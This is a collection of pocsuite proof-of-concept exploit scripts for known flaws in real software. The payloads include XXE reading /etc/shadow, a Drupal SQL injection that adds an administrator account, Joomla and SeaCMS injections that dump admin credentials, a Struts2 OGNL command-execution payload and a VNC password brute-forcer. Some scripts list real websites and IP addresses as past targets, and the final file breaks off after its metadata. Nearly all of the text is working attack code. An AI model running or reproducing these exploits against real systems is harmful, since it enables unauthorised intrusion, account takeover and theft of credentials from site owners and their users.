#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = '85903'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2014-04-16'
    createDate = '2015-11-12'
    updateDate = '2015-11-12'
    references = ['http://www.sebug.net/vuldb/ssvid-85903']
    name = 'EMC Cloud Tiering Appliance v10.0 Unauthenticated XXE Arbitrary File Read'
    appPowerLink = 'N/A'
    appName = 'EMC Cloud Tiering Appliance'
    appVersion = '10.0'
    vulType = 'XXE'
    desc = '''
        EMC Cloud Tiering Appliance（CTA）是美国易安信（EMC）公司的一套基于策略的文件分层、
        归档和迁移解决方案。该方案通过自动化文件分层、文件归档和文件迁移等功能优化网络存储（NAS）基础架构。
        该架构的v10.0版本的/api/login处存在XXE漏洞，导致可以读取任意文件
    '''
    samples = ['']

    def _attack(self):
        result = {}
        return self.parse_output(result)

    def _verify(self):
        result = {}
        #下面以尝试读取/etc/shadow为例子进行测试
        filename='/etc/shadow'
        payload=r'<?xml version="1.0" encoding="ISO-8859-1"?>'\
                 '<?xml version="1.0" encoding="ISO-8859-1"?>'\
                 '<!DOCTYPE foo ['\
                 '<!ELEMENT foo ANY >'\
                 '<!ENTITY xxe SYSTEM "file://{file}" >]>' \
                 '<Request>'\
                 '<Username>root</Username>'\
                 '<Password>root</Password>'\
                 '</Request>'.format(file=filename)

        expurl='{url}/api/login'.format(url=self.url)
        try:
            response=req.post(expurl,data=payload,headers=self.headers, timeout=50)
            if re.match('root:.+?:0:0:.+?:.+?:.+?', response.content) and response.status_code==200:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = expurl
                result['Fileinfo']['Filename']=filename
                result['Fileinfo']['Content']=response.content
            else:
                result={}
        except:
            result={}
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/env python
# coding: utf-8
import urllib
import random
import string
from collections import OrderedDict

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '1571'  # vul ID
    version = '1'
    author = 'zhengdt'
    vulDate = '2014-10-16'
    createDate = '2014-10-16'
    updateDate = '2014-10-16'
    references = ['https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html']
    name = 'Drupal 7.x /includes/database/database.inc SQL注入漏洞 POC'
    appPowerLink = 'https://www.drupal.org/'
    appName = 'Drupal'
    appVersion = '7.x'
    vulType = 'SQL Injection'
    desc = '''
        Drupal 在处理 IN 语句时，展开数组时 key 带入 SQL 语句导致 SQL 注入，
        可以添加管理员、造成信息泄露。
    '''

    samples = ['http://216.119.147.168/', 'http://69.172.67.176/']

    def _attack(self):
        result = {}
        vul_url = '%s/?q=node&destination=node' % self.url
        uid = int(random.random() * 1000)
        username = ''.join(random.sample(string.letters+string.digits, 5))
        payload = OrderedDict()

        if not self._verify(verify=False):
            return self.parse_attack(result)

        payload['name[0;insert into users(uid, name, pass, status, data) values (%d, \'%s\', ' \
                '\'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld\', 1, \'{b:0;}\');' \
                'insert into users_roles(uid, rid) values (%d, 3);#]' % (uid, username, uid)] \
                 = 'test'
        payload['name[0]'] = 'test2'
        payload['pass'] = 'test'
        payload['form_id'] = 'user_login_block'

        #print urllib.urlencode(payload)
        response = req.post(vul_url, data=payload)
        if response.status_code == 200:
            result['AdminInfo'] = {}
            result['AdminInfo']['Username'] = username
            result['AdminInfo']['Password'] = 'thanks'

        return self.parse_attack(result)

    def _verify(self, verify=True):
        result = {}
        vul_url = '%s/?q=node&destination=node' % self.url
        payload = {
            'name[0 and (select 1 from (select count(*),concat((select md5(715890248' \
                '135)),floor(rand(0)*2))x from  information_schema.tables group by x' \
                ')a);;#]': 'test',
            'name[0]': 'test2',
            'pass': 'test',
            'form_id': 'user_login_block',
        }

        response = req.post(vul_url, data=payload).content
        if 'e4f5fd37a92eb41ba575c81bf0d31591' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = urllib.urlencode(payload)

        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)


#!/usr/bin/env python
#coding=utf-8

import traceback
import socket
from time import time,sleep
# 用于VNC认证爆破，参考：https://github.com/c0ny1/pwcracker/blob/master/plus/vnc.py
from Cryptodome.Cipher import DES

# 将输入的url转换为ip:port，供socket使用
from pocsuite3.lib.utils import url2ip

from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY


'''
基于socket的未授权访问参考：https://github.com/knownsec/pocsuite3/blob/0f68c1cef3804c5d43be6cfd11c2298f3d77f0ad/pocsuite3/pocs/redis_unauthorized_access.py
'''
class VNC_POC(POCBase):
    vulID = 'VNC-unauthorized-access'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    appName = 'VNC'
    appVersion = ''
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = "INFORMATION_DISCLOSURE"

    vulDate = '2020-04-14'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2020-04-14'  # 编写 PoC 的日期
    updateDate = '2020-04-14'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://mntn0x.github.io/2019/08/02/RealVNC%E6%BC%8F%E6%B4%9E/']  # 漏洞地址来源,0day不用写
    name = 'VNC未授权访问漏洞'  # PoC 名称
    cvss = u"高危"

    
    def _verify(self):
        result={}

        vul_url = self.url
        target_url = vul_url

        # 传入True参数，得到host和port，参考：https://github.com/knownsec/pocsuite3/blob/0f68c1cef3804c5d43be6cfd11c2298f3d77f0ad/pocsuite3/lib/utils/__init__.py
        host, port = url2ip(target_url, True)  

        
        
        try:
            '''
            socket.setdefaulttimeout(5)   # 默认timeout时间
            server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

            server.connect((host, port))

            hello = server.recv(12)

            print("[*] Hello From Server: {0}".format(hello))

            # 如果响应内容中有"RFB", 比如"RFB 003.008"（版本号），则认为是VNC服务
            
            if "RFB 003.008" in str(hello):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target_url
                return self.save_output(result)
            '''

            if self.crack(host, port):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target_url
                return self.save_output(result)

            return self.save_output(result)
        except socket.error as msg:
            print('[*] Could not connect to the target VNC service. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1])
            traceback.print_stack(msg)


    #漏洞攻击
    def _attack(self):
        return self._verify()


    def crack(self, host, port):
        passwords = ['123456', 'admin', 'root', 'password', '123123', '123', '1', '',
                    'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#',
                    '123456789', '123321', '1314520', '666666', 'woaini', 'fuckyou', '000000',
                    '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123', 'abc123456',
                    '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd', 'p@55w0rd', 'password!',
                    'p@ssw0rd!', 'password1', 'r00t', 'system', '111111', 'admin']

        vnc = VNC()
        timeout='5'

        try:
            with Timing() as timing:
                # VNC握手
                code, mesg = 0, vnc.connect(host, int(port or 5901), int(timeout))

            with Timing() as timing:
                # VNC认证
                for password in passwords:
                    code, mesg = vnc.login(password.encode())    # str -> byte

        except Exception as e:
            print(e)
            traceback.print_stack()
    
        if code == 0:    # 返回00 00 00 00，代表认证成功
            return True, u'Crack success!'
        elif code == 1:  # 返回00 00 00 01，代表认证失败
            return False, u'Crack fail!'
        else:
            return False, u'Crack fail!'


    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


# 自定义类
class Timing:
    def __enter__(self):
        self.t1 = time()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        self.time = time() - self.t1


# 自定义类
class VNC:

    # VNC握手
    def connect(self, host, port, timeout):
        self.fp = socket.create_connection((host, port), timeout=timeout)
        resp = self.fp.recv(99) # banner

        # 参考：https://help.realvnc.com/hc/en-us/articles/360003563111-Too-many-security-failures#what-causes-this-message--0-0
        if 'Too many security failures' in resp.decode():
            raise Exception('IP blocked after five unsuccessful connection attempts!')
        
        print('banner: {0}'.format(resp))
        self.version = resp[:11]

        if len(resp) > 12:
            raise Exception('%s %r' % (self.version, resp[12:]))

        return self.version


    # VNC认证
    def login(self, password):
        #print 'Remote version: %r' % self.version
        major, minor = self.version[6], self.version[10]

        if (major, minor) in [('3', '8'), ('4', '1')]:
            proto = 'RFB 003.008\n'

        elif (major, minor) == ('3', '7'):
            proto = 'RFB 003.007\n'

        else:
            proto = 'RFB 003.003\n'

        print('Client version: {0}'.format(proto[:-1]))
        type(proto)
        type(proto.encode())
        self.fp.sendall(proto.encode())

        sleep(0.5)

        resp = self.fp.recv(99)
        print('Security types supported: {0}'.format(resp))

        if major == '4' or (major == '3' and int(minor) >= 7):
            code = ord(resp[0:1].decode())
            if code == 0:
                raise Exception('Session setup failed: %s' % resp)

            self.fp.sendall(b'\x02') # always use classic VNC authentication
            resp = self.fp.recv(99)

        else: # minor == '3':
            code = ord(resp[3:4].decode())
            if code != 2:
                raise Exception('Session setup failed: %s' % resp)

        resp = resp[-16:]

        if len(resp) != 16:
            raise Exception('Unexpected challenge size (No authentication required? Unsupported authentication type?)')


        print('Challenge: {0}'.format(resp))
        print(password.ljust(8, '0'))
        pw = password.ljust(8, '0')[:8] # make sure it is 8 chars long, zero padded
        key = self.gen_key(pw)

    
        des = DES.new(key, DES.MODE_ECB)
        enc = des.encrypt(resp)
    
        #print 'enc: %r' % enc
        self.fp.sendall(enc)
    
        resp = self.fp.recv(99)
        #print 'resp: %r' % resp
    
        code = ord(resp[3:4].decode())
        mesg = resp[8:]
    
        if code == 1:
            return code, mesg or 'Authentication failure'
    
        elif code == 0:
            return code, mesg or 'OK'
    
        else:
            raise Exception('Unknown response: %r (code: %s)' % (resp, code))


    def gen_key(self, key):
        newkey = []
        for ki in range(len(key)):
            print(key[ki])
            print(str(key[ki]))
            bsrc = ord(str(key[ki]))
            btgt = 0
            for i in range(8):
                if bsrc & (1 << i):
                    btgt = btgt | (1 << 7-i)
            newkey.append(btgt)

        return ''.join(chr(c) for c in newkey)


register_poc(VNC_POC)



#!/usr/bin/env python
#_*_ encoding: utf-8 _*_

from pocsuite3.api import Output, POCBase, register_poc, requests

class Elasticsearch(POCBase):
    vulID = '62520'
    version = '1.0'
    author = ['big04dream']
    vulDate = '2013-11-20'
    createDate = '2019-10-11'
    updateDate = '2019-10-11'
    references = ['https://www.seebug.org/vuldb/ssvid-62520']
    name = 'Elasticsearch Unauthorized access'
    appPowerLink = 'http://www.elasticsearch.cn/'
    appName = 'elasticsearch'
    appVersion = 'all'
    vulType = 'Unauthorized access'
    desc = '''
    Elasticsearch Unauthorized access
    '''
    
    def _verify(self):
        result = {}
        try:
            u = self.url
            port = 9200
            url = u + ':' + str(port) + '/_cat'
            response = requests.get(url)
            if response.status_code == 200 and '/_cat/master' in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Payload'] = url
        except:
            pass
        return self.parse_output(result)
    
    def _attack(self):
        return self._verify()
    
    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output
    
register_poc(Elasticsearch)


#!/usr/bin/python
# -*- coding: utf-8 -*-
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from urlparse import urlparse,urljoin
from pocsuite.api.utils import randomStr
from pocsuite.api.request import req
import socket

class PhpUip():
    def __init__(self, url):
        self.MinQSL = 1500
        self.MaxQSL = 1950
        self.url = url
        self.BreakingPayload = "/PHP%0Ais_the_shittiest_lang.php"
        self.PossibleQSLs = []
        self.MaxPisosLength = 256
        self.qslandpisos = None
    
    def get_baseStatus(self):
        target = self.url + "/path%0Ainfo.php?{}".format('Q'*(self.MinQSL-1))
        self.baseStatus = req.get(target).status_code
    
    def get_qsl(self):
        for qsl in range(self.MinQSL, self.MaxQSL, 5):
            resp = req.get(self.url + self.BreakingPayload + "?" + "Q"*(qsl-1))
            if resp.status_code != self.baseStatus:
                self.PossibleQSLs = [qsl, qsl - 5 , qsl - 10]
    
    def SanityCheck(self):
        header = {
           "D-Pisos": "8{}D".format("="*self.MaxPisosLength)
        }
        for _ in range(10):
            if req.get(self.url + "/PHP%0ASOSAT?" + "Q"*(self.MaxQSL - 1), headers = header).status_code == self.baseStatus:
                pass
            else:
                return False
        return True
            
    def get_pisos(self):
        host = urlparse(self.url).hostname
        port = urlparse(self.url).port
        for qsl in self.PossibleQSLs:
            for pisos in range(self.MaxPisosLength):
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                head = "GET /index.php/PHP_VALUE%0Asession.auto_start=1;;;?{} HTTP/1.1\r\n".format("Q"*(qsl-1))
                head += "Host: {}:{}\r\n".format(host, str(port))
                head += "User-Agent: Mozilla/5.0\r\n"
                head += "D-Pisos: 8{}D\r\n".format("="*pisos)
                head += "Ebut: mamku tvoyu\r\n\r\n"
                s.connect((host, port))
                s.send(head)
                recv = s.recv(1024)
                if "PHPSESSID" in recv and "path=" in recv:
                    self.qslandpisos = (qsl, pisos)
                    return
                s.close()

    def poc(self):
        self.get_baseStatus()
        self.get_qsl()
        if self.PossibleQSLs:
            if self.SanityCheck():
                self.get_pisos()
                if self.qslandpisos:
                    return True
        return False



class TestPOC(POCBase):
    vulID = 'N/A'  # ssvid
    version = '1.0'
    author = 'fairy'
    vulDate = ''
    createDate = ''
    updateDate = ''
    references = ['']
    name = ''
    appPowerLink = ''
    appName = ''
    appVersion = ''
    vulType = ''
    desc = ''' 
    '''
    samples = ['']
    install_requires = ['']
    def _verify(self):
        result = {}
        test = PhpUip(self.url + '/index.php')

        if test.poc():
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

        return self.parse_output(result)


    _attack = _verify

    
    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)



#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = '70468'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2010-12-25'
    createDate = '2016-01-23'
    updateDate = '2016-01-23'
    references = ['http://www.seebug.org/vuldb/ssvid-70468']
    name = 'Joomla Component (com_idoblog) SQL Injection Vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla Component (com_idoblog)'
    appVersion = 'N/A'
    vulType = 'SQL Injection'
    desc = '''
        Joomla 组件(com_idoblog)对参数userid过滤不严格，导致出现SQL注入漏洞。
        远程攻击者无需登陆，可以利用该漏洞执行SQL指令。

        利用updatexml报错回显方式读取数据库版本的POC如下所示：

        http://xxx.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=-1
        or 1=(updatexml(1,concat(0x3a,version()),1))
    '''
    samples = ['http://www.aca2k.org']

    def _attack(self):
        #利用floor注入读取MySQL数据库信息
        result = {}
        #访问的地址
        exploit='/index.php?option=com_idoblog&task=profile&Itemid=&userid='
        #利用floor方式读取信息
        payload="-1 or 1=(SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x247e7e7e24,"\
        "user(),0x2a2a2a,version(),0x247e7e7e24,FLOOR(RAND(0)*2))x FROM "\
        "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
        #构造漏洞利用连接
        vulurl=self.url+exploit+payload
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #提取信息的正则表达式
        parttern='\$~~~\$(.*)\*\*\*(.*)\$~~~\$'
        #发送请求
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #检查是否含有特征字符串
        if 'Duplicate entry' in resp.content:
            #提取信息
            match=re.search(parttern,resp.content,re.M|re.I)
            if match:
                #漏洞利用成功
                result['DbInfo']={}
                #数据库用户名
                result['DbInfo']['Username']=match.group(1)
                #数据库版本
                result['DbInfo']['Version']=match.group(2)
        return self.parse_output(result)

    def _verify(self):
        #通过floor方式计算md5(3.1415)的值，来验证SQL注入
        result = {}
        #访问的地址
        exploit='/index.php?option=com_idoblog&task=profile&Itemid=&userid='
        #利用floor的方式（计算md5(3.1415)）
        payload="-1 or 1=(SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x247e7e7e24,"\
        "md5(3.1415),FLOOR(RAND(0)*2))x FROM "\
        "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
        #构造漏洞利用连接
        vulurl=self.url+exploit+payload
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #发送请求
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #检查是否含有特征字符串(md5(3.1415)=63e1f04640e83605c1d177544a5a0488)
        if '63e1f04640e83605c1d177544a5a0488' in resp.content:
            #漏洞验证成功
            result['VerifyInfo']={}
            result['VerifyInfo']['URL'] = self.url+exploit
            result['VerifyInfo']['Payload'] = payload
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/env python
# coding: utf-8

import urllib
import random
import string
import urllib2
from collections import OrderedDict

from pocsuite.api.request import req  #用法和 requests 完全相同
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


def post(url, data):
    req = urllib2.Request(url)
    data = urllib.urlencode(data)
    # enable cookie
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
    response = opener.open(req, data)
    return response.read()

class TestPOC(POCBase):
    vulID = '96270'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1'  #默认为1
    author = 'lyb'  #  PoC作者的大名
    vulDate = '2018/4/8'  #漏洞公开的时间,不知道就写今天
    createDate = '2018/4/8'  # 编写 PoC 的日期
    updateDate = '2018/4/8'  # PoC 更新的时间,默认和编写时间一样
    references = [
        'https://www.seebug.org/vuldb/ssvid-96270']  # 漏洞地址来源,0day不用写
    name = 'struts2-048 命令执行漏洞 PoC'  # PoC 名称
    appPowerLink = 'https://www.seebug.org/'  # 漏洞厂商主页地址
    appName = 'struts2'  # 漏洞应用名称
    appVersion = '2.3.x'  # 漏洞影响版本
    vulType = 'Command Execution	'  #漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        当开发者使用Struts2 Struts1的插件时，可能会因为不受信任的输入导致远程命令执行漏洞的产生。通过官方的Demo：Struts2-showcase验证该远程命令执行漏洞。
    '''  # 漏洞简要描述
    samples = []  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写

    def _attack(self):
        '''attack mode'''
        return self._verify()


    def _verify(self):
        '''verify mode'''
        result = {}
        posturl = self.url
        data = {
            'name': "${(#dm=@\u006Fgnl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#ef='echo s2-048-EXISTS').(#iswin=(@\u006Aava.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#efe=(#iswin?{'cmd.exe','/c',#ef}:{'/bin/bash','-c',#ef})).(#p=new \u006Aava.lang.ProcessBuilder(#efe)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
            'age': 'bbb', '__checkbox_bustedBefore': 'true', 'description': 'ccc'}
        res = post(posturl, data)[:100]
        if 's2-048-EXISTS' in res:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)



from urllib.parse import urlparse

from pocsuite3.api import Output, POCBase, register_poc, logger, requests


class DemoPOC(POCBase):
    vulID = ''  # ssvid
    version = '3.0'
    author = ['']
    vulDate = '2020-8-24'
    createDate = '2020-8-24'
    updateDate = '2020-8-24'
    references = ['']
    name = 'BT UNAuth'
    appPowerLink = ''
    appName = 'BT'
    appVersion = ''
    vulType = 'UNAuth'
    desc = '''
    '''
    samples = []
    install_requires = ['']

    def exploit(self, mode):
        result = {}

        url_pr = urlparse(self.url)
        scheme = url_pr.scheme
        host = url_pr.hostname
        port = 888

        vul_url = "{}://{}:{}/pma/".format(scheme, host, port)
        resp = requests.get(vul_url, timeout=5)
        if resp.status_code == 200 and "phpmyadmin" in resp.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vul_url
        return result

    def _verify(self):
        result = {}

        try:
            result = self.exploit(mode='verify')
        except Exception as e:
            logger.error(str(e))
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = '68151'  # ssvid
    version = '1.0'
    author = ['0xFATeam']
    vulDate = ''
    createDate = '2016-01-08'
    updateDate = '2016-01-08'
    references = ['http://www.sebug.net/vuldb/ssvid-68151']
    name = 'MunkyScripts Simple Gallery SQL Injection Vulnerability'
    appPowerLink = ''
    appName = 'MunkyScripts Simple Gallery'
    appVersion = ''
    vulType = 'Other'
    desc = '''
    '''
    samples = ['']

    def _verify(self):
        payload = "/gallery.php?cid='/**/UNION/**/SELECT/**/1,2,(concat_ws(0x3a,md5(1))),4 %23"
        response = req.get(self.url + payload)
        return self.parse_output(response)

    def _attack(self):
        result = {}
        #Write your code here

        return self._verify(self)

    def parse_output(self, response):
        output = Output(self)
        result = {}

        if response:
            m = re.search(r'c4ca4238a0b923820dcc509a6f75849b', response.content)
            if m:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = response.url
                output.success(result)
        else:
            output.fail('Internet Nothing Returned')

        return output


register(TestPOC)


#!/usr/bin/python
# -*- coding: utf-8 -*-


# If you have issues about development, please read:
# https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md
# https://github.com/knownsec/Pocsuite/blob/master/docs/COPYING

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re


def send_command(url):
	try:
		httpreq = req.Session()
		headers ={
		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
		"Accept-Encoding": "gzip, deflate",
		"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
		"Connection": "close",
		"Cookie": "_gauges_unique_month=1; _gauges_unique_year=1; _gauges_unique=1; _gauges_unique_hour=1; _gauges_unique_day=1",
		"Host": "httpbin.org",
		"Referer": "http://httpbin.org/",
		"Upgrade-Insecure-Requests": "1",
		"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
		 }


		resp = httpreq.get(url, headers=headers)
	except:
		resp = None
	return resp


class TestPOC(POCBase):
	name = 'seacms前台一处鸡肋报错注入，绕过80sec，360webscan获取数据'.decode('utf-8')
	vulID = '0'
	author = ['小雨']
	vulType = 'sql_inj'
	version = '1.0'  # default version: 1.0
	references = ['https://www.t00ls.net/thread-43489-1-1.html']
	createDate = '2018.01.04'
	appName = 'seacms'
	appVersion = '6.58'


	def _attack(self):
		'''attack mode'''
		result = {}
		self.url = self.url + "/zyapi.php?ac=videolist&ids=1)%20or%20char(@`%27`)%20or%20updatexml(1,(select%20concat_ws(0x7e,0x7e,name,password)%20from%23%0asea_admin),1)%23%27"

		resp = send_command(self.url)
		if resp and resp.text and resp.status_code == 200:
			info = re.findall(r'Error infos: XPATH syntax error: \'~~(.+?)\'', resp.text)
			if len(info) > 0:
				info1 = info[0].split('~')
				result['Database'] = {}
				result['Database']['user'] = info1[0]
				result['Database']['password'] = info1[1]


		return self.parse_output(result)

	def _verify(self):
		'''verify mode'''
		return self._attack()

	def parse_output(self, result):
		output = Output(self)
		if result:
			output.success(result)
		else:
			output.fail('Internet nothing returned')
		return output


register(TestPOC)



#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = '84553'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2011-02-16'
    createDate = '2016-01-25'
    updateDate = '2016-01-25'
    references = ['http://www.seebug.org/vuldb/ssvid-84553']
    name = 'Joomla! and Mambo com_lexikon Component - &#39;id&#39; Parameter SQL Injection Vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla! and Mambo com_lexikon Component'
    appVersion = 'N/A'
    vulType = 'SQL Injection'
    desc = '''
        Joomla! and Mambo com_lexikon组件的参数 id 过滤不严，导致出现SQL注入漏洞。

        该漏洞的POC格式如下：
        http://www.example.com/index.php?option=com_lexikon&id=-1/**/union/**/select
        /**/concat(username,0x3a,password),concat(username,0x3a,password),concat
        (username,0x3a,password) from mos_users--+ 
    '''
    samples = ['http://www.deutsche-handwerker.info']

    def _attack(self):
        #利用SQL注入读取joomla管理员信息
        result = {}
        #访问的地址
        exploit='/index.php?option=com_lexikon&id='
        #利用Union方式读取信息
        payload=("-1 union select 1,concat(0x247e7e7e24,username"
            ",0x2a2a2a,password,0x2a2a2a,email,0x247e7e7e24),3 from mos_users limit 0,1--+")
        #构造漏洞利用连接
        vulurl=self.url+exploit+payload
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #提取信息的正则表达式
        parttern='\$~~~\$(.*)\*\*\*(.*)\*\*\*(.*)\$~~~\$'
        #发送请求
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #检查是否含有特征字符串
        if '$~~~$' in resp.content:
            #提取信息
            match=re.search(parttern,resp.content,re.M|re.I)
            if match:
                #漏洞利用成功
                result['AdminInfo']={}
                #用户名
                result['AdminInfo']['Username']=match.group(1)
                #密码
                result['AdminInfo']['Password']=match.group(2)
                #邮箱
                result['AdminInfo']['Email']=match.group(3)
        return self.parse_output(result)

    def _verify(self):
        #通过计算md5(3.1415)的值，来验证SQL注入
        result = {}
        #访问的地址
        exploit='/index.php?option=com_lexikon&id='
        #利用union的方式（计算md5(3.1415)）
        payload="-1 union select 1,md5(3.1415),3--+"
        #构造漏洞利用连接
        vulurl=self.url+exploit+payload
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #发送请求
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #检查是否含有特征字符串(md5(3.1415)=63e1f04640e83605c1d177544a5a0488)
        if '63e1f04640e83605c1d177544a5a0488' in resp.content:
            #漏洞验证成功
            result['VerifyInfo']={}
            result['VerifyInfo']['URL'] = self.url+exploit
            result['VerifyInfo']['Payload'] = payload
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @userVersion : python 2.7
# @Author  : lyb
# @Data    : 2018/12/14
# @Effect  : thinkphp5__5_0_5_1_execute
# @Version : V0.0

import urllib
import random
import string
from collections import OrderedDict

import requests #用法和 requests 完全相同
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    PocName = 'thinkphp5__5_0_5_1_execute '
    vulID = '1'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1'  #默认为1
    author = 'lyb'  #  PoC作者的大名
    vulDate = '2018/12/14'  #漏洞公开的时间,不知道就写今天
    createDate = '2018/12/14'  # 编写 PoC 的日期
    updateDate = '2018/12/14'  # PoC 更新的时间,默认和编写时间一样
    references = [
        'https://www.seebug.org/vuldb/ssvid-97715']  # 漏洞地址来源,0day不用写
    name = 'Thinkphp5控制器名过滤不严导致getshell PoC'  # PoC 名称
    appPowerLink = 'https://blog.thinkphp.cn/869075'  # 漏洞厂商主页地址
    appName = 'thinkphp5'  # 漏洞应用名称
    appVersion = '5.0 5.1'  # 漏洞影响版本
    vulType = 'Command Execution'  #漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，受影响的版本包括5.0和5.1版本
    '''  # 漏洞简要描述
